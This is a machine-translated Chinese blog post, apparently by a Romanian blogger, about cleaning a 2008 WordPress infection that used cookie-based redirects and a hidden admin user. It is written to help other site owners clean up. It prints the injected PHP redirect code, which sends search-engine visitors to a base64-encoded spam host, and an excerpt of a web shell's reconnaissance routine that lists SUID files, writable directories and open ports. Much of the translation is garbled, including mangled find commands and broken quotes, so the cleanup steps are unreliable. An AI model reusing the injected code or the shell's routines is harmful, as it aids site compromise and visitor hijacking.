在過去的一個月中,我已經收到了警告 病毒的博客 在一些遊客。 起初,我忽略了警告,因為我安裝了一個相當不錯的防病毒(Kaspersky AV 2009的),雖然很長一段時間的博客,我從來沒有得到病毒警報(..我看到了可疑的東西,第一次刷新消失。最後...)。
慢慢開始出現大的變化 訪客流量後交通最近一直在穩步下降,並開始被越來越多的人告訴我,誰, stealthsettings.COM 這是 病毒之。 我昨天收到從別人做的截圖,當防病毒堵住了 腳本 從 stealthsettings.com:木馬Clicker.HTML.IFrame.gr的。 這是相當有說服力的給我,我把所有源搜索。 來到我的腦海的第一個想法是做 升級 最新版本的 WordPress (2.5.1),但不是在刪除舊腳本中的所有文件之前 WordPress 並使 備份數據庫。 這個程序沒有用,如果沒有告訴我,可能要花我很長時間才能弄清楚錯誤在哪裡。 歐根 邊喝咖啡邊討論,他發現 鏈接 谷歌,這將是很好看他。
MyDigitalLife.info發表了一篇文章,標題為:WordPress 黑客:恢復和修復 Google 和搜索引擎或沒有 Cookie 流量重定向到 Your-Needs.info、AnyResults.Net、Golden-Info.net 和其他非法網站“這就是我所需要的線程結束。
這是關於一個 利用 de WordPress 基於 cookie,我認為這是非常複雜的,言書。 聰明足以讓 SQL注入 數據庫的博客, 創建一個不可見的用戶 一個簡單的例行檢查 我的帳戶->用戶, 檢查服務器“可寫的目錄和文件” (那 chmod 777), 搜索和 執行 文件的root用戶或組的權限。 我不知道誰剝削的名稱和看他寫的文章,有幾個儘管許多博客被感染,包括羅馬尼亞。 好吧...我會盡量嘗試解釋泛泛的病毒。
是什麼病毒?
首先,將源頁面的博客,遊客看不見,但可見的和可轉位的搜索引擎,尤其是谷歌的鏈接。 如此 把網頁排名的網站的攻擊者表示。 第二,插入另一個 重定向代碼 URL,雅虎,谷歌,現場為遊客來自或RSS閱讀器,而不是網站 餅乾。 一 殺毒軟件 檢測重定向 木馬Clicker.HTML的.
症狀:
大規模遊客流量下降特別是其中大部分遊客來自谷歌的博客。
鑑別: (對於那些不太了解 phpmyadmin、php 和 linux)
LA。 注意! 首先做一個備份的數據庫!
1。 查看源文件 的index.php, header.php文件, footer.php文件博客話題,看看是否有一個代碼,使用加密 base64 或以以下形式包含“ if($ ser ==” 1?&& sizeof($ _ COOKIE)== 0)”:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>或者什麼的。 刪除此代碼!
點擊圖片...
在上面的屏幕截圖中,我不小心選擇了“ ”。 該代碼必須保留。
2。 使用 phpMyAdmin的 並去到數據庫表 wp_users凡檢查,如果沒有創建的用戶名 00:00:00 0000-00-00 (可能的放置 用user_login 來寫 ”WordPress”。 記下此用戶的 ID(ID 字段),然後將其刪除。
點擊圖片...
*綠線應該除掉,並保留了他的身份證。 的情況下 困ID = 8 .
3。 轉到表 wp_usermeta,在哪裡 位於 和 消除 線的編號(在該字段 USER_ID 刪除ID值出現)。
4。 在表 wp_option去 active_plugins 和插件啟用嫌疑。 它可以用來像結局 _old.giff,_old.pngg _old.jpeg,_new.php.giff等豐富的圖片擴展名與_old和_new的組合。
SELECT * FROM wp_options WHERE option_name = 'active_plugins'刪除此插件,然後轉到博客->儀表板->插件,您可以在其中停用和激活任何插件。
點擊圖片出現active_plugins病毒文件。
按照路徑上的FTP或SSH在active_plugins表示從服務器刪除該文件。
5.同樣在phpMyAdmin中,在表中 wp_option,查找並刪除行“rss_f541b3abd05e7962fcab37737f40fad8“而在”internal_links_cache“.
在internal_links_cache的加密的垃圾鏈接出現在您的博客和 的代碼 Google Ads頸背黑客。
6。 推薦 更改密碼 博客和登錄 刪除所有可疑userele. 升級到最新版本 WordPress 並設置博客停止註冊新用戶。 沒有損失……他們也可以評論無人居住。
我在上面嘗試了一些解釋,以說明在這種情況下如何清除此病毒的博客。 這個問題比看起來嚴重得多,並且沒有解決,因為它們被使用了 安全漏洞 Web服務器託管,這是博客。
具有訪問權限的安全性,作為第一項措施 SSH,在服務器上進行一些檢查,看看是否有任何文件,如_old *和* _new *結局。吉夫,JPEG,pngg。jpgg。 必須將這些文件刪除。 如果重命名文件,例如。 top_right_old.giff in top_right_old.php我們可以看到,該文件是完全的攻擊代碼服務器。
有關檢查,清潔和固定服務器的一些有用說明。 (通過SSH)
1. CD / tmp目錄 並檢查是否有文件夾,如 tmpVFlma 或其他組合有相同的名稱,並刪除它。 請看下面的截圖,從我的兩個這樣的文件夾:
使用rm-rf文件夾
2、檢查排除(改 chmod-ul) 盡可能有屬性的文件夾 chmod 777
查找當前目錄中所有可寫文件: 查找。 型F燙髮2-LS
在當前目錄中找到所有可寫目錄: 查找。 D型燙髮2 LS
查找當前目錄中所有可寫的目錄和文件: 查找。 彼爾姆2 LS
3。 尋找可疑文件服務器上的。
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, 注意! 的文件將被置位 SUID si SGID. 這些文件的用戶(組)或根,而不是執行文件的用戶的權限執行。 這些文件會導致根妥協,如果安全問題。 如果您使用的文件的SUID和SGID位,執行“chmod 0“ 或卸載包包含。
利用包含在源某處...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}在這種方式...基本上發現的安全漏洞。 端口打開目錄“可寫”和組執行權限的文件/根。
返回更多...
感染一些博客:www.blegoo.com、www.visurat.ro、
fulgerica.com,denisuca.com,www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro,www.nitza.ro,
motociclete.motomag.ro,
emi.brainient.com,www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com,www.itex.ro / blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/、www.damaideparte.ro,
dragos.roua.ro,www.artistul.ro / blog /,
www.mirabilismedia.ro/blog,blog.einvest.ro
......這樣的例子不勝枚舉......很多。
您可以使用Google搜索引擎檢查博客是否被感染。 複製粘貼:
網站www.blegoo.com採購
晚安,做好工作;)很快,我想Eugen將會在prevezibil.imprevizibil.com上發布新聞。
BRB :)
注意力! 改變主題 WordPress 或升級到 WordPress 2.5.1,不是擺脫這種病毒的解決方案。
